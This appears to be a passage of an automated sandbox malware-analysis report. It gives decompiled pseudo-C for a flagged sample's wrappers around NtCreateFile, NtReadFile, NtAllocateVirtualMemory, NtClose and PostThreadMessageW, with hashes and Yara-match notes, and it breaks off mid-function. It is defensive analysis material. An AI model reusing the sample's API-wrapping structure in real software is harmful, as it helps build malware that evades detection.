                                          • Opcode ID: 989a99728f5d3fd41f55dbeef6ea95967e5b171b9bc780f8826328b2e2f7ccf5
                                          • Instruction ID: 7f92864f45cf3ca67b45b990d53c327ffe0249674551ab4ccc4cabb80f823d68
                                          • Opcode Fuzzy Hash: 989a99728f5d3fd41f55dbeef6ea95967e5b171b9bc780f8826328b2e2f7ccf5
                                          • Instruction Fuzzy Hash: 58014B72204204BFCB14DF99DC85DD77BADEF8C350F108549FA5C8B201C634E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E563 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 428 41e563-41e5b4 call 41f1b3 NtCreateFile
                                          C-Code - Quality: 100%
                                          			E0041E563(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                          0x0041e572
                                          0x0041e57a
                                          0x0041e5b0
                                          0x0041e5b4

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5B0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                          • Instruction ID: 858a361c7fac73dd57bd9bb54302a998ea006c4b18dec6683183bae7ba4cde4d
                                          • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                          • Instruction Fuzzy Hash: D0F06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158258BA0997241D630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E613 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 437 41e613-41e65c call 41f1b3 NtReadFile
                                          C-Code - Quality: 25%
                                          			E0041E613(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t14;
				signed int _t15;
				void* _t19;
				intOrPtr _t21;
				intOrPtr* _t27;

				_t14 = _a4;
				_t21 =  *((intOrPtr*)(_t14 + 0x14));
				_t3 = _t14 + 0xa74; // 0xa76
				_t27 = _t3;
				_t15 = E0041F1B3(_t21, _t14, _t27, _t21, 0, 0x2a);
				 *((intOrPtr*)(__ebx + 0x458b2c55)) =  *((intOrPtr*)(__ebx + 0x458b2c55)) + _t21;
				 *((intOrPtr*)(__ebx - 0x3b7cdbb3)) =  *((intOrPtr*)(__ebx - 0x3b7cdbb3)) - _t21;
				asm("adc al, 0x52");
				_t19 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _t21, _t15 |  *_t15); // executed
				return _t19;
			}








                                          0x0041e616
                                          0x0041e619
                                          0x0041e622
                                          0x0041e622
                                          0x0041e62a
                                          0x0041e62e
                                          0x0041e634
                                          0x0041e63a
                                          0x0041e658
                                          0x0041e65c

                                          APIs
                                          • NtReadFile.NTDLL(004194D3,004149A1,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A1,004194D3,00000002,00000000), ref: 0041E658
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                          • Instruction ID: 7e6d20b8ab43ac4c6dd8b0e9747e979c985991331e4e85b11870b547d3735a74
                                          • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                          • Instruction Fuzzy Hash: 27F0FFB2200208ABCB04DF89DC84EEB77ADAF8C754F018208BE0DA7241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E743 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 440 41e743-41e780 call 41f1b3 NtAllocateVirtualMemory
                                          C-Code - Quality: 100%
                                          			E0041E743(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                          0x0041e75a
                                          0x0041e77c
                                          0x0041e780

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E77C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                          • Instruction ID: 0a6495e8f7e44f4a31df3bacb5b33776950b50f0b2a852a5fc142efbc3aec1ab
                                          • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                          • Instruction Fuzzy Hash: B0F01EB2210208ABCB18DF89DC81EEB77ADAF88754F018119BE0897241C630F821CBF4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E68F Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E68F(void* __eax, void* __esi, intOrPtr _a4, void* _a8) {
				long _t15;

				_t12 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t12, _t12 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t15 = NtClose(_a8); // executed
				return _t15;
			}




                                          0x0041e696
                                          0x0041e6aa
                                          0x0041e6b8
                                          0x0041e6bc

                                          APIs
                                          • NtClose.NTDLL(004102C8,00000000,?,004102C8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6B8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 9fc0b77864bc79e118e7065a84f160bb50efa7f73b5c36ea076cc26817774705
                                          • Instruction ID: f9cd73a8d8550e9af34dccee213d7d49f29f51c87b206270a25c4ed3f04bde21
                                          • Opcode Fuzzy Hash: 9fc0b77864bc79e118e7065a84f160bb50efa7f73b5c36ea076cc26817774705
                                          • Instruction Fuzzy Hash: 4EE08C32A00314AFD710EF98CC46F973BA8DF48660F01845ABA189B242C670E9108BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E693 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E693(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                          0x0041e6aa
                                          0x0041e6b8
                                          0x0041e6bc

                                          APIs
                                          • NtClose.NTDLL(004102C8,00000000,?,004102C8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6B8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                          • Instruction ID: 42318626d70f5b73991a76424c016a3848acfe8a2a5351ee0a56f11cd2c8e816
                                          • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                          • Instruction Fuzzy Hash: 8FD01772604214BBD610EBA9DC89FD77BACDF48664F018469BA1C5B242C570FA108AE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 48a776485f53181a72a9bebb908dd89d8f33b3f9e8e0a64a55973dd36e97225e
                                          • Instruction ID: ac7c751a508f939a2a7a5f6a58e1123b1d558087e451960da53b08f039a1a200
                                          • Opcode Fuzzy Hash: 48a776485f53181a72a9bebb908dd89d8f33b3f9e8e0a64a55973dd36e97225e
                                          • Instruction Fuzzy Hash: 9D9002B120100902D140719984057460105A7D0341F52C015A6454594EC6998DD577E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 38a6fd7f893809d0386616a7cae53e43c1b71ae668fe3563d6142fd8e1ce5a81
                                          • Instruction ID: 0c1dadb93d61d071b1e3ced5ab32582c8fae4c0c8400c2d56428ae14c8bcabc4
                                          • Opcode Fuzzy Hash: 38a6fd7f893809d0386616a7cae53e43c1b71ae668fe3563d6142fd8e1ce5a81
                                          • Instruction Fuzzy Hash: 6C9002A134100942D10061998415B060105E7E1341F52C019E2454594DC659CC5272A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7d743b1cff0bb6f93c71e534ab77e5a0d1f816e5ee7501a6062e5155045ca131
                                          • Instruction ID: 41079aee4c22e9cef834cfa9ea55d90f02f3fe40819f1cf1bd8aa1def07f4cf4
                                          • Opcode Fuzzy Hash: 7d743b1cff0bb6f93c71e534ab77e5a0d1f816e5ee7501a6062e5155045ca131
                                          • Instruction Fuzzy Hash: EA900261242046525545B19984056074106B7E0281792C016A2804990CC5669856F7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3382f177101fff6bcd00e92ae2338c1cd2f1718b5d32ee0a2824ab5aa0aa588a
                                          • Instruction ID: 491aa21a32eb54d4a64ffbacddb0143599f8cea63106d073d5090152b8518c70
                                          • Opcode Fuzzy Hash: 3382f177101fff6bcd00e92ae2338c1cd2f1718b5d32ee0a2824ab5aa0aa588a
                                          • Instruction Fuzzy Hash: D590027120100913D111619985057070109A7D0281F92C416A1814598DD6968952B2A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bb74c9f56250604d891e9aa6924581e3877532a016dedfbe410679ec19ddccb6
                                          • Instruction ID: b7dd56b3a529717e04a8f6171328ea547e4fb21ec28428ab6a3e55c6eb0c62f0
                                          • Opcode Fuzzy Hash: bb74c9f56250604d891e9aa6924581e3877532a016dedfbe410679ec19ddccb6
                                          • Instruction Fuzzy Hash: D090026160100A02D10171998405716010AA7D0281F92C026A2414595ECA658992B2B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d26e1b4303cd7f46812d4719696319d2a6d7e255385382b6c0fb8a4bb53f6da6
                                          • Instruction ID: 3dd1c6551a337ef60c0fcb4b75f4d83c1f0ec2d150e4ae3b5fd6d4f3cc19cb0d
                                          • Opcode Fuzzy Hash: d26e1b4303cd7f46812d4719696319d2a6d7e255385382b6c0fb8a4bb53f6da6
                                          • Instruction Fuzzy Hash: A590027120140902D1006199881570B0105A7D0342F52C015A2554595DC665885176F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a685a53903f439a6ccf9395023cce19206c18d5c471b4fa9293168476a071183
                                          • Instruction ID: 39e869b06fcda9d64084810429df7ee42a7d50badf31168be3d1f745bd2354ec
                                          • Opcode Fuzzy Hash: a685a53903f439a6ccf9395023cce19206c18d5c471b4fa9293168476a071183
                                          • Instruction Fuzzy Hash: 4790026160100542414071A9C845A064105BBE1251752C125A1D88590DC599886577E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7f27567aaba6342b6332b989ab2ee607f90fdf2df674065a8d6db8d3974312e3
                                          • Instruction ID: 19d8e745abce0c4444377d01b7f55b794aeba43da411074f4ff211f181523d2d
                                          • Opcode Fuzzy Hash: 7f27567aaba6342b6332b989ab2ee607f90fdf2df674065a8d6db8d3974312e3
                                          • Instruction Fuzzy Hash: 6390026121180542D20065A98C15B070105A7D0343F52C119A1544594CC955886176A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 925b743f875d9a2ba7f202c692c4ecc1cd9bace67b7708b36950df68a5c74015
                                          • Instruction ID: a7e4dc6802f3816b027c3f3c6e3de732c1ee87979de43142605eb919faf77045
                                          • Opcode Fuzzy Hash: 925b743f875d9a2ba7f202c692c4ecc1cd9bace67b7708b36950df68a5c74015
                                          • Instruction Fuzzy Hash: E0900265211005030105A59947056070146A7D5391352C025F2405590CD661886172A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9721ab432709719a81451d3757a84ca1c9c56b09708ca3a12061a9ce144750ff
                                          • Instruction ID: e762391e2b01368930a286aa1b51783dd33a26e74d0a8ab0661c00b639fbe943
                                          • Opcode Fuzzy Hash: 9721ab432709719a81451d3757a84ca1c9c56b09708ca3a12061a9ce144750ff
                                          • Instruction Fuzzy Hash: E09002A120200503410571998415716410AA7E0241B52C025E24045D0DC565889172A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4c0a246efba73e826125c925e31b260ff32d00c85cb8bb5cf904f336e2a46828
                                          • Instruction ID: 60db6efef3128cec25700c22a416fa7ad7229706e21eebe61ddf46cfc4ab45e5
                                          • Opcode Fuzzy Hash: 4c0a246efba73e826125c925e31b260ff32d00c85cb8bb5cf904f336e2a46828
                                          • Instruction Fuzzy Hash: 3090027120100902D10065D994097460105A7E0341F52D015A6414595EC6A5889172B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2ac1bfe1663029a29877fd7f664b932f8009b2fe12d2d58864457bf16fba9ff2
                                          • Instruction ID: 2fda15ce55c615e4cf1a8d2b4c83ed8e40b0ac3bb2425b87b015ef29bad98e4d
                                          • Opcode Fuzzy Hash: 2ac1bfe1663029a29877fd7f664b932f8009b2fe12d2d58864457bf16fba9ff2
                                          • Instruction Fuzzy Hash: C090026921300502D1807199940970A0105A7D1242F92D419A1405598CC955886973A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 402191e0d7358cbffafae839eb2088a355e5f970e5b8d69c7d992ebd1164602a
                                          • Instruction ID: df9e500c5cbd68c8f0aa897e9cadc8c2a3599038c3fa7e16064ae6c375d1f30b
                                          • Opcode Fuzzy Hash: 402191e0d7358cbffafae839eb2088a355e5f970e5b8d69c7d992ebd1164602a
                                          • Instruction Fuzzy Hash: DF90026130100503D140719994197064105F7E1341F52D015E1804594CD955885673A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e649323e3f151a4ab73f60067bb8517dc566b365de8c775c4f0a1bf890a42f25
                                          • Instruction ID: c9f34f66f8374048e44d03b6e104c387d5419e39826127115ae229d433dd38b7
                                          • Opcode Fuzzy Hash: e649323e3f151a4ab73f60067bb8517dc566b365de8c775c4f0a1bf890a42f25
                                          • Instruction Fuzzy Hash: 3490027131114902D1106199C4057060105A7D1241F52C415A1C14598DC6D5889172A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: eb846f4847049124fbb2d82d0f2b97b66299a387517b82d7ff305ac163bfe18d
                                          • Instruction ID: c475082a9aae24c3fe23df52ccb33e4f9fdb18bdf8bedd88ff78e801f66f022c
                                          • Opcode Fuzzy Hash: eb846f4847049124fbb2d82d0f2b97b66299a387517b82d7ff305ac163bfe18d
                                          • Instruction Fuzzy Hash: 4E90027120100D02D1807199840574A0105A7D1341F92C019A1415694DCA558A5977E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14fcd29c9584aaff12b72de961dd418b8c554fcd99ebd8c01e0cf65077858417
                                          • Instruction ID: 5a3075d5e3f328f55a11af32032a2017f7e6d014979893b2e6fabc260b327d1d
                                          • Opcode Fuzzy Hash: 14fcd29c9584aaff12b72de961dd418b8c554fcd99ebd8c01e0cf65077858417
                                          • Instruction Fuzzy Hash: 2590027120108D02D1106199C40574A0105A7D0341F56C415A5814698DC6D5889172A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E8B3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 41e8b3-41e8df call 41f1b3 ExitProcess
                                          C-Code - Quality: 100%
                                          			E0041E8B3(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x9b0)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x9b0)), 0, 0x36);
				ExitProcess(_a8);
			}



                                          0x0041e8b6
                                          0x0041e8cd
                                          0x0041e8db

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: w5@
                                          • API String ID: 621844428-2048009441
                                          • Opcode ID: 8507ec16cc2b02f0ab8836c409ef938952160c81a4140b7f33e31095b455bb70
                                          • Instruction ID: 1ed00d9a66ebf349a6f1bdeba4fc8f4a3585a7d1f921a18fc4373dfdb201933d
                                          • Opcode Fuzzy Hash: 8507ec16cc2b02f0ab8836c409ef938952160c81a4140b7f33e31095b455bb70
                                          • Instruction Fuzzy Hash: B6D01272600314BBD620DB99DC45FD777ACDF456A4F054065BA4C5B242C674BA10C7E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040992B Relevance: 1.7, APIs: 1, Instructions: 185threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 337 40992b-409931 338 409933-40998b call 420183 call 409893 call 41f9d3 337->338 339 4098cf-4098e7 call 402e13 call 4195b3 337->339 353 409993-4099c5 call 4102e3 call 41e703 338->353 348 409920-409926 339->348 349 4098e9-4098fa PostThreadMessageW 339->349 349->348 352 4098fc-40991d call 40c5d3 349->352 352->348 360 4099c7-4099cf 353->360 361 4099fa-409a02 353->361 362 4099d1-4099d8 360->362 363 4099e9-4099f3 360->363 362->363 364 4099da-4099e1 362->364 363->353 365 4099f5-4099f8 363->365 364->363 366 4099e3-4099e7 364->366 367 409a20-409a32 call 41e693 365->367 366->363 368 409a03-409a1d call 420103 366->368 367->361 373 409a34-409a9f call 41df13 367->373 368->367 373->361 376 409aa5-409b01 call 41df53 373->376 376->361 379 409b07-409b54 call 41f673 call 41f693 call 420323 call 420103 call 4191a3 376->379
                                          C-Code - Quality: 75%
                                          			E0040992B(void* __eflags, intOrPtr _a4, int _a8, int _a12, int _a16) {
				int _v8;
				int _v132;
				int _v136;
				char _v656;
				int _v668;
				char _v684;
				char _v688;
				int __ebx;
				intOrPtr __edi;
				int __esi;
				int _t60;
				void* _t63;
				void* _t67;
				long _t69;
				void* _t70;
				int _t71;

				asm("sahf");
				if(__eflags < 0) {
					_t60 = E004195B3(_t70, _t67, 0, 0, E00402E13());
					_t71 = _t60;
					if(_t71 != 0) {
						_t69 =  *0xFFFFFFFFF2FE0EE5;
						_t60 = PostThreadMessageW(_t69, 0x111, 0, 0); // executed
						if(_t60 == 0) {
							_t3 = (E0040C5D3(1, 8, _t63 + 0x3b4) & 0x000000ff) - 0x40; // 0xf2fe0e99
							_t60 =  *_t71(_t69, 0x8003, 0xf2fe0ed9 + _t3, _t60);
						}
					}
					return _t60;
				} else {
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
